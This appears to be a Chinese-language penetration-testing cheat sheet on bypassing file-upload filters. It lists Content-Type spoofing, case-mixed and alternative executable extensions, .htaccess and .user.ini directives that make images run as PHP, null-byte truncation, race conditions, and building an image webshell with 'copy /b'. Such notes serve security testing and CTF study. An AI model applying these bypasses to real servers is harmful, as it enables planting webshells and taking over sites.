前端绕过
- 修改js代码
- 修改后缀为可上传后缀,再抓包修改回可利用后缀
content-type
抓包修改content-type
常见将其修改为gif/jpeg类型,即更改为image/jpeg image/gif
大小写绕过
后缀名大小写穿插,绕过过滤区分大小写的情况
畸形后缀(部分)
PHP
- php1-7
- pht
- phtml
- phar
- phps
ASP
- aspx
- cer
- cdx
- asa
- asax
JSP
- jspa
- jspx
.htaccess/.user.ini
.htaccess
上传覆盖.htaccess
内容一般为
SetHandler application/x-httpd-php或者
AddType application/x-httpd-php .jpg也可以写为
AddHandler php5-script .jpg若过滤了文件内容中的php,也可写为
AddType application/x-httpd-ph\
p .jpg.user.ini
auto_prepend_file=a.jpg //指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。它包含在所有php文件前先执行
auto_append_file=a.jpg //解析后进行包含,它包含在所有php文件执行后执行双写绕过
适用于将php等关键字替换为空的
例如php写成pphphp
00截断
文件名在url参数中的在文件名后加%00
文件名在POST数据中的,修改16进制
条件竞争
抓包并发爆破即可
文件头检测
制作图片木马
copy /b 1.jpg+shell.php shell.jpg或者直接在一句话前加上可用文件头,如GIF89a
windows特性
- 后缀加.
- 后缀加::$DATA
